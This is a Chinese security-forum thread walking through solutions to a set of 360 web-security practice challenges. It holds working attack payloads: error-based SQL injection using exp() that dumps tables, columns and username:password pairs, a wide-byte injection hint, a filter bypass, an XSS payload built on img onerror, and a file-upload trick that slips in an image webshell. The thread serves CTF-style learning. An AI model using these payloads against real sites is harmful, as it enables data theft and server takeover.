查看: 209950|回复: 9

[教程] 关于360出的10道测试题的解题思路。(上篇)

[复制链接]
  • TA的每日心情
    奋斗
    2017-10-1 09:06
  • 签到天数: 380 天

    [LV.9]以坛为家II

    发表于 2016-11-1 20:44:24 | 显示全部楼层 |阅读模式
    第一道题:http://103.238.227.13:10087/index.php?id=x

    文中可以看看出过滤了注入关键字。
    然后测试发现在拦截的字中加入<>即可绕过。

    出来了库,然后表与字段告诉了,那么就可以直接查询数据了。

    第二题:http://103.238.227.13:10083/index.php?id=1
    测试发现是宽字节注入。

    注入的老办法出了数据。
    第三题:http://103.238.227.13:10088/index.php?id=1
    root写文件,但是却过滤了union。这里说一种另类方式读取文件。

    这里利用了数字运算函数exp()报错溢出数据。
    //通过exp()函数报错注入。
    ' or exp(~(select*from(select user())a))%23  //查询数据库,版本,用户。

    爆表语句:
    select exp(~(select*from(select table_name from information_schema.tables where table_schema=database() limit 0,1)x));

    爆列语句:
    select exp(~(select*from(select column_name from information_schema.columns where table_name='users' limit 0,1)x));

    爆数据:
    select exp(~ (select*from(select concat_ws(':',id, username, password) from users limit 0,1)x));
    想了解的可以百度下。
    第四题:http://103.238.227.13:10086/

    抓包是一项比较实用的办法有时。
    第五题:http://103.238.227.13:10085/

    分享到此结束了。以上思路都是wuyan表哥提供。有兴趣的朋友可以去试试。剩下的5道我就不会了!还望表哥些能分享下,可以写个帖子,也可以做了出来就在评论中指导下!
    剩下⑤道题的地址:
    http://103.238.227.13:10082/

    http://103.238.227.13:10081/

    http://103.238.227.13:10080/

    http://103.238.227.13:10089/   

    http://103.238.227.13:10084/index.php?id=x

    本帖子中包含更多资源

    您需要 登录 才可以下载或查看,没有账号?注册

    ×
    回复

    使用道具 举报

  • TA的每日心情
    无聊
    2017-9-11 15:40
  • 签到天数: 425 天

    [LV.9]以坛为家II

    发表于 2016-11-1 20:55:51 | 显示全部楼层
    可以可以,继续努力

    点评

    哈哈,膜拜表哥!多带带我们哦!  详情 回复 发表于 2016-11-1 21:08
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2017-10-1 09:06
  • 签到天数: 380 天

    [LV.9]以坛为家II

     楼主| 发表于 2016-11-1 21:08:53 | 显示全部楼层

    RE: 关于360出的10道测试题的解题思路。(上篇)

    wuyan 发表于 2016-11-1 20:55
    可以可以,继续努力

    哈哈,膜拜表哥!多带带我们哦!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2022-11-4 00:00
  • 签到天数: 325 天

    [LV.8]以坛为家I

    发表于 2016-11-1 22:34:14 | 显示全部楼层
    其实对我来说直接就枚举他的get值。哈哈
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2016-11-3 09:21
  • 签到天数: 82 天

    [LV.6]常住居民II

    发表于 2016-11-2 10:02:55 | 显示全部楼层
    xss哪一题我解出来了,Flag:17f094325e90085b30a5ddefce34acd8   说一下思路吧,
    1:首先页面获取的是id参数的值,那么我们就需要根据id来设置值,例如:id=xxxxx  
    2:页面过滤了< "所以要把这些绕过
    3:绕过这个可以百度照一下我是百度找的方法
    4:利用javascript的onerror事件触发
    最后成品地址:http://103.238.227.13:10089/?id=\u003cimg%20src=x%20onerror=eval(alert(_key_));\u003e

    点评

    谢谢表哥!我也是去学习一下。  详情 回复 发表于 2016-11-2 14:24
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2017-10-1 09:06
  • 签到天数: 380 天

    [LV.9]以坛为家II

     楼主| 发表于 2016-11-2 14:24:05 | 显示全部楼层

    RE: 关于360出的10道测试题的解题思路。(上篇)

    m7lrv 发表于 2016-11-2 10:02
    xss哪一题我解出来了,Flag:17f094325e90085b30a5ddefce34acd8   说一下思路吧,
    1:首先页面获取的是id参 ...

    谢谢表哥!我也是去学习一下。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2016-11-3 09:21
  • 签到天数: 82 天

    [LV.6]常住居民II

    发表于 2016-11-2 15:44:36 | 显示全部楼层
    文件上传那个道题目答案是:Flag:b72bdc2c1f7f3448ca3e72a9b57e596a
    1:找个一个合成好的图片马
    2:上传图片,修改filename="m7lrv.php1.jpg"
    然后答案就出来了,不知道这算什么题目,如果有解析漏洞的话好像可以解析,php1 这种会被解析为php文件

    点评

    么么哒,有请表哥继续分享。我也去尝试下!  详情 回复 发表于 2016-11-2 17:48
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2017-10-1 09:06
  • 签到天数: 380 天

    [LV.9]以坛为家II

     楼主| 发表于 2016-11-2 17:48:48 | 显示全部楼层

    RE: 关于360出的10道测试题的解题思路。(上篇)

    m7lrv 发表于 2016-11-2 15:44
    文件上传那个道题目答案是:Flag:b72bdc2c1f7f3448ca3e72a9b57e596a
    1:找个一个合成好的图片马
    2:上传图 ...

    么么哒,有请表哥继续分享。我也去尝试下!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    难过
    2016-12-13 18:32
  • 签到天数: 7 天

    [LV.3]偶尔看看II

    发表于 2016-11-2 18:53:28 | 显示全部楼层
    第一个绕过直接大小写混着来就可以了吧,类似SelEcT

    点评

    不行,你试试就知道了1  详情 回复 发表于 2016-11-2 19:11
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2017-10-1 09:06
  • 签到天数: 380 天

    [LV.9]以坛为家II

     楼主| 发表于 2016-11-2 19:11:59 | 显示全部楼层

    RE: 关于360出的10道测试题的解题思路。(上篇)

    SVK 发表于 2016-11-2 18:53
    第一个绕过直接大小写混着来就可以了吧,类似SelEcT

    不行,你试试就知道了1
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-4-26 11:38 , Processed in 0.054636 second(s), 15 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部